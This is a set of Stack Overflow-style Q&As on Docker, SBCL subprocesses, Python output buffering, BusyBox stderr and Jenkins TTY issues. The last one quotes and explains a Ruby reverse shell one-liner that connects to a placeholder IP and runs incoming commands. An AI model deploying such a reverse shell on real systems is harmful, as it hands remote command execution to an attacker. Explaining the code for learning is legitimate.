Execute 'docker run' from within SBCL Common Lisp

I'm trying to run a function in my Lisp program. It is a bot connected to an IRC channel, and with a special command you can ask the bot to evaluate a simple Lisp expression. Because it is extremely dangerous to execute arbitrary code from people on the internet, I want the actual evaluation to happen in a VM that runs a Docker container for every evaluation query the bot gets.
My function looks like this:
(defun run-command (cmd)
  (uiop:run-program (list "docker" "run" "--rm" "-it" "my/docker"
                          "sbcl" "--noinform" "--no-sysinit" "--no-userinit"
                          "--noprint" "--disable-debugger"
                          "--eval" (string-trim '(#\Return) (format nil "~A" cmd))
                          "--eval" "(quit)")
                    :output '(:string :stripped t)))
The idea behind this function is to start a container that has SBCL in it, run the command via sbcl --eval, and print the result to the container's stdout. That printed string should then be the return value of run-command.
If I call
docker run --rm -it my/docker sbcl --noinform --no-sysinit --no-userinit --noprint --disable-debugger --eval "(print (+ 2 3))" --eval "(quit)"
on my command line, I get just 5 as the result, which is exactly what I want.
But if I run the same command from Lisp with the uiop:run-program function, I get
Subprocess #<UIOP/LAUNCH-PROGRAM::PROCESS-INFO {1004FC3923}>
with command ("docker" "run" "--rm" "-it"
"my/docker" "sbcl" "--noinform"
"--no-sysinit" "--no-userinit" "--noprint"
"--disable-debugger" "--eval" "(+ 2 3)")
as an error message, which means the process failed somehow. But I don't know what exactly is wrong here. If I execute, for example, "ls", I get its output, so the function itself seems to work properly.
Is there some special knowledge I need about uiop:run-program or am I doing something completely wrong?
Thanks in advance.
Edit: It turns out the -it flag caused issues. After removing the flag, a new error emerged: the bot doesn't have permission to execute docker. Is there a way to give it that permission without granting it sudo rights?

There's probably something wrong with the way docker (or SBCL) is invoked here. To get the error message, invoke uiop:run-program with the :error-output :string argument, and then choose the continue restart to actually terminate execution and get the error output printed (if you're running from SLIME or some other REPL). If you call this in a non-interactive environment, you can wrap the call in a handler-bind:
(handler-bind ((uiop/run-program:subprocess-error
                 (lambda (e) (invoke-restart (find-restart 'continue)))))
  (run-command ...))
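For comparison outside Lisp, here is a rough Python sketch of the same debugging idea (hypothetical, not the bot's actual code): run the container, capture stderr separately, and surface it when the command fails.
import subprocess

# Capture both streams; check=True raises CalledProcessError on a
# non-zero exit status, much like UIOP's subprocess-error.
# Note: no -it flag, per the edit above.
try:
    result = subprocess.run(
        ["docker", "run", "--rm", "my/docker", "sbcl", "--noinform",
         "--no-sysinit", "--no-userinit", "--noprint", "--disable-debugger",
         "--eval", "(print (+ 2 3))", "--eval", "(quit)"],
        capture_output=True, text=True, check=True,
    )
    print(result.stdout.strip())
except subprocess.CalledProcessError as err:
    print("docker failed:", err.stderr)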

It turned out the -it flag did cause trouble. After removing it and granting the bot the correct permissions, everything worked out fine.

Related

My docker container keeps instantly closing when trying to run an image for bigcode-tools

I'm new to Docker, and I'm not quite sure how to deal with this situation.
So I'm trying to run a docker container in order to replicate some results from a research paper, specifically from here: https://github.com/danhper/bigcode-tools/blob/master/doc/tutorial.md
(image link: https://hub.docker.com/r/tuvistavie/bigcode-tools/).
I'm using a Windows machine, and every time I try to run the docker image (via docker run -p 80:80 tuvistavie/bigcode-tools), it instantly closes. I've tried running other images, such as getting-started, and that image doesn't close instantly.
I've looked at some other potential workarounds, like using -dit, but since the instructions require setting an alias/doskey for a docker run command, using the alias and chaining it with other commands multiple times ends up queuing runs of the docker container, since the port is tied to the alias.
Following the instructions from the GitHub link, I'm trying to set an alias/doskey to make API calls to pull data, but I am not getting any data, nor any errors, when performing the calls in the command prompt.
Sorry for the long question, and thank you for your time!
Going in order of the instructions:
0. I can run this, it added the image to my Docker Desktop
1.
Since I'm using a Windows machine, I had to use 'set' instead of 'export'.
I'm not exactly sure what the $ means in UNIX and whether it carries significant meaning, but from my understanding, the whole purpose is to create a directory named 'bigcode-workspace'.
Instead of 'alias', I needed to use doskey.
Since -dit prevented my image from instantly closing, I added that in as well, but I'm not 100% sure what it does. Running docker run (...) without it resulted in the image instantly closing.
When it came to using the doskey alias + another command, I've tried:
(doskey macro) (another command)
(doskey macro) ^& (another command)
(doskey macro) $T (another command)
This also seemed to be using a GitHub API call, so I added a --token=(github_token), but that didn't change anything either.
Because the later steps require expected data pulled from here, I am unable to progress any further.
It looks like this image is designed to be used as a command-line utility, so it should not run continuously; instead, you invoke it via the docker-bigcode alias for each task.
$BIGCODE_WORKSPACE is an environment variable expansion here, so on a Windows machine it's %BIGCODE_WORKSPACE%. You might want to set this variable in Settings -> System -> About -> Advanced System Settings, because variables set with the SET command apply only to the current command prompt session. Or you can specify the path directly, without the environment variable.
As for the alias, I would just create a batch file with the following content:
docker run -p 6006:6006 -v %BIGCODE_WORKSPACE%:/bigcode-tools/workspace tuvistavie/bigcode-tools %*
This will run the specified command, appending the batch file's parameters at the end. You might need to add double quotes around the -v argument if the BIGCODE_WORKSPACE path contains spaces.

"docker logs" command only shows stderr [duplicate]

When using a print() statement in a Python app running inside a Docker container that's managed by Docker Compose, only sys.stderr output is logged. Vanilla print() statements aren't seen, so this:
print("Hello? Anyone there?")
... never shows up in the regular log output.
(You can see other logs explicitly printed by other libs in my app, but none of my own calls.)
How can I avoid my print() calls being ignored?
By default, Python buffers output to sys.stdout. When stdout is not attached to a terminal, as inside a container, it is block-buffered, so output may not appear until the buffer fills or the program exits.
There are a few options:
1. Call an explicit flush
Refactor the original print statement to include a flush=True keyword, like:
print("Hello? Anyone there?", flush=True)
Note: this flushes the entire buffer, not just the output of that one print call. So any output still pending from 'bare' print calls elsewhere (i.e. without flush=True) will be flushed at the same time.
You could achieve the same thing with:
import sys
sys.stdout.flush()
This option is useful if you want the most control over when the flushing occurs.
2. Unbuffer the entire app via the PYTHONUNBUFFERED env var
Drop the following into the environment section of your docker-compose.yml file:
PYTHONUNBUFFERED: 1
This will cause all output to stdout to be flushed immediately.
3. Run python with -u
Like option #2 above, this causes Python to run unbuffered across the full execution lifetime of your app. Just run it with python -u <entrypoint.py>; no need for the environment variable.
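A related variant, as a minimal sketch (Python 3.7+, assuming sys.stdout is the default TextIOWrapper): reconfigure stdout to line-buffered at startup, so each completed line is flushed without touching individual print calls.
import sys

# Flush on every newline from here on; print() output then shows up
# in `docker logs` as it happens.
sys.stdout.reconfigure(line_buffering=True)

print("Hello? Anyone there?")  # now visible immediately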
Simply add the -u option to the python line of your Dockerfile, and it will print your logs:
CMD ["python", "-u", "my_python_script.py"]
No need to change an environment variable or modify all the print statements in your program.
Using pytest, the solution for me was to add the -s option.
For example, in my scenario where I also needed verbose mode on, I had to put pytest -sv.

How does BusyBox evade my redirection of stdout, and can I work around it?

I have a BusyBox based system, and another one with vanilla Ubuntu LTS.
I made a C++ program which takes main()'s argv[1] as a command name, then fork()s and execl()s that command in the child process. Right before that, I used dup2() to redirect the child's standard output, similar to this, so the parent process can read() its output.
Then, the text read from the child is written to the console, with markers, to see that it was the parent who output this.
Now if I run this program with "dd --help" as its argument, two different things happen:
on the Ubuntu system, the output clearly comes from the parent process (and only from it)
on the BusyBox system, the parent process reads back nothing, and the output of dd is written directly to the console, apparently bypassing my attempted redirection.
Since all the little commands on the BusyBox system are symlinks to the single BusyBox executable, and I thought that could be the problem, I also tried making a child process out of "busybox dd --help".
That changed nothing, though.
But: if I do "busybox --help", all of the output is caught by the child process and nothing "spills" past it. (Note I left out the dd subcommand here; this is only --help for BusyBox itself.)
What's the reason for this happening, and (how) can I get this to work as intended on the BusyBox system, too?
BusyBox writes its own output, e.g. when called with options like --help, to stdout. But its implemented commands, like dd, write their output to stderr, even when it is not an error, which I found rather unintuitive and hence didn't look down that alley at first.
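So the fix is to redirect the child's stderr as well as its stdout (in the C++ program, one more dup2() for file descriptor 2). A minimal sketch of the same idea in Python:
import subprocess

# Merge the child's stderr into the captured stdout stream, since
# BusyBox applets such as `dd` print their --help text on stderr.
result = subprocess.run(
    ["busybox", "dd", "--help"],
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,
    text=True,
)
print("[parent] captured:", result.stdout)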

How to run repo from a script inside a container in a jenkins job

I am unable to run repo non-interactively inside a container as part of a freestyle job.
It prompts for the user-name and email. I got round that by doing a git config --global inside the job.
But then it does the color test, and that hangs indefinitely.
Looking at the source code for repo I see this
if os.isatty(0) and os.isatty(1) and not self.manifest.IsMirror:
    if opt.config_name or self._ShouldConfigureUser():
        self._ConfigureUser()
    self._ConfigureColor()
So, I ran the following inside the container:
python -C "import os; print os.isatty(0), os.isatty(1)"
and, sure enough, it printed out True True
Looking at the Jenkins log, it launches the container with --tty specified, and there seems to be no way to configure that option.
I can't find a bash option to force a script to be run in a non-interactive shell. If I put the above python line in a file and execute it with almost any combination of commands and options, it still prints out True True
The only way I see something different is if I use I/O redirection
bash <a.sh
which prints out False True - i.e. stdin is not a tty, and
bash <a.sh >a.log
which prints False False.
For a complex script, are there any problems using the bash <script approach?
Does anyone know any jenkins magic to prevent docker being launched using --tty?
I know that the --tty is the culprit. I built the container locally and ran the following
$ docker run repotest python -c "import os;print os.isatty(0), os.isatty(1)"
False False
$ docker run --tty repotest python -c "import os;print os.isatty(0), os.isatty(1)"
True True
Running Versions:
repo: 1.12.37 (per Ubuntu 16.04 apt-get)
Jenkins: 2.149
Cloudbees Docker Plugin: 1.7.3
Container base is ubuntu:xenial
I'm using the "Build inside a docker container" option.
To run the bash script repo_script.sh "non-interactively", or more precisely without terminals associated with its standard streams, you could simply run it as
repo_script.sh < /dev/null 2>&1 | cat
assuming you want to see the output the way you would when running repo_script.sh directly. Because standard output and standard error are piped to a different process, the file descriptors appear to repo_script.sh as pipes, not TTYs. You could also direct the output to a file, or even to /dev/null if you do not care about it:
log_file=/dev/null
repo_script.sh < /dev/null > "${log_file}" 2>&1
Running the script as
bash < repo_script.sh | cat
might work too, though it is a very unorthodox and, to my mind, hackish way of running a script just to break the association of a TTY with standard input. From the script engine's point of view, reading a script program from a file is different from reading it from standard input (which, if it is a terminal, is typically not seekable), so there might be some subtle differences that could bite you in unexpected ways. This way also does not clearly communicate your intention to the next person who needs to understand your code, and may lead to partial hair loss in that person due to extraneous head scratching.
There is no need for any bash options; using output redirections in the interpreting shell, as described above, is an easy-to-comprehend, multi-platform standard convention for changing the standard stream associations.
P.S. I think it should be enough for the repo script to test only whether standard input is a TTY. It looks to me like the author of that script did not think this through. There is simply no use waiting for input if there is no terminal device associated with standard input; from that alone the script could determine that everything needs to run without user interaction, or stop with an error if that is not possible.
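A minimal sketch of that suggested check (hypothetical, not repo's actual code): prompt only when stdin is an interactive terminal.
import sys

# With `< /dev/null`, isatty() is False and the prompts are skipped.
if sys.stdin.isatty():
    name = input("Your name: ")
else:
    print("stdin is not a TTY; running without user interaction",
          file=sys.stderr)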

Ruby one-liner breakdown?

I'm new to Ruby and trying to better understand this reverse shell one-liner designed to connect back to a Netcat listener.
Can someone break the command down and explain what some of the code actually does? For example, I know TCPSocket.new creates a new TCP socket, but what do "cmd=c.gets", "IO.popen", "|io|c.print io.read", etc. do? And what is the purpose of the while loop?
ruby -rsocket -e "c=TCPSocket.new('<IP Address>','<Port>');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"
OK, let's break this one down.
ruby
runs the ruby interpreter, you likely knew that part
-rsocket
does the equivalent of require "socket" (r for require)
-e "some string"
run some string as a ruby script (e for execute)
while(cmd=c.gets)
is saying "while gets (get string up to and including the next newline) returns something from the connection c, i.e. while there's data coming in, assign it to cmd and..
IO.popen(cmd,'r'){|io|c.print io.read}
.. run cmd as a shell command, read the output, and print it back onto the connection c.
So, effectively, receive a command (like ls . or rm -rf /) over the network, read it in, run it, take the output, and send it back. Keep doing so until the other side stops sending commands.
Because gets will block and wait for the next line to come in, this one-liner will sit there waiting until the connection is closed.
You probably don't want to let other people send commands down that connection, since it will run whatever they send directly on your computer, though that is presumably what you mean by "reverse shell".
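If IO.popen is the unfamiliar piece, here is a rough equivalent of just that step in Python (hypothetical, for illustration only):
import subprocess

# Like Ruby's IO.popen(cmd, 'r') { |io| io.read }: run the command
# through the shell and collect everything it writes to stdout.
output = subprocess.run("ls .", shell=True,
                        capture_output=True, text=True).stdout
print(output)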
